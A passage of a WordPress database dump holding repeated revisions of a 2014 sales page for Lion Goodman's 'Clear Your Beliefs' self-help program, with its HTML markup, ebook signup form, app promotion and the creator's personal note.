program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:41:34', '2014-11-20 04:41:34', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1817, 2, '2014-11-19 23:45:08', '2014-11-20 04:45:08', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:45:08', '2014-11-20 04:45:08', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1818, 2, '2014-11-19 23:46:34', '2014-11-20 04:46:34', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 74px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:46:34', '2014-11-20 04:46:34', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1819, 2, '2014-11-20 00:08:40', '2014-11-20 05:08:40', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4">http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4</a>Free eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:08:40', '2014-11-20 05:08:40', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1822, 2, '2014-11-20 00:16:21', '2014-11-20 05:16:21', '<h4>Posts not found</h4>Free eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:16:21', '2014-11-20 05:16:21', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1821, 2, '2014-11-20 00:15:33', '2014-11-20 05:15:33', '<h1 class="su-post-title">307601254</h1>\nPosted: November 19, 2014 | <a href="http://clearyourbeliefs.com/?attachment_id=1798#comments" class="su-post-comments-link">0 comments</a>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4">http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 00:15:33', '2014-11-20 05:15:33', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1825, 2, '2014-11-20 00:23:16', '2014-11-20 05:23:16', 'Free eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your 